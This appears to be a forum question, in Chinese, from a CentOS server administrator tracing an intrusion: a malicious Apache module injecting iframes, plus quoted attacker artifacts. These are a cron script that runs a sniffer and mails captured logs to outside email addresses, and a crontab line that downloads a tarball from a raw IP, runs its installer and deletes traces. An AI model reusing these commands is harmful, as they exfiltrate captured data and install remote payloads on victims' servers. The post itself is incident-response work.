我目前正试图找出我们的一台 centos 服务器是如何被入侵的。我们在我们的网站上遇到了恶意软件。经过搜索，我终于找到了注入网站的恶意软件。由于它是随机发生的，因此很难被发现。我遵循了这篇博客文章的帮助：

http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-injects-iframes/

这导致我搜索了每个 apache 模块，最终找到了一个注入恶意软件的模块。它以 mod_string_mime.so 的名称命名，并通过 /etc/httpd/conf.d/mailman.conf 加载以避免检测。非常令人沮丧。因此，该模块现在被删除，mailman.conf 文件恢复正常。

进一步挖掘，我安装并运行了 rkhunter。运行此程序后，我在 /etc/cron.daily/ 中发现了一个名为 dnsquery 的可疑文件的警告。在这个文件中，这就是它的样子……

#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log > test
cat /usr/share/misc/blah/temp.log |uniq >> test
echo >/usr/share/misc/blah/temp.log
mail unul_catalin@yahoo.com -s "$(hostname -f)" < test
mail cata@catalinx.org -s "$(hostname -f)" < test
rm -rf test httpd.log
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A

我试图删除这个文件，但它每分钟都会回来。所有者和组是“psaadm”。我找不到它是如何创建的。我假设它是通过 plesk cron 或其他东西生成的。

我还在 crontab 中找到了这个：

*   *   *   *   *   chattr -AacDdijsSu /bin/; cd /root ; wget http://77.241.87.75/xpsa/skdet.tgz; chmod +x skdet.tgz; tar zxvf skdet.tgz ; cd skdet ; ./inst; rm -rf /usr/share/misc /root/sk* /tmp/nc* /root/ssh/;

这看起来不对。

有关如何进行或定位入侵的任何建议？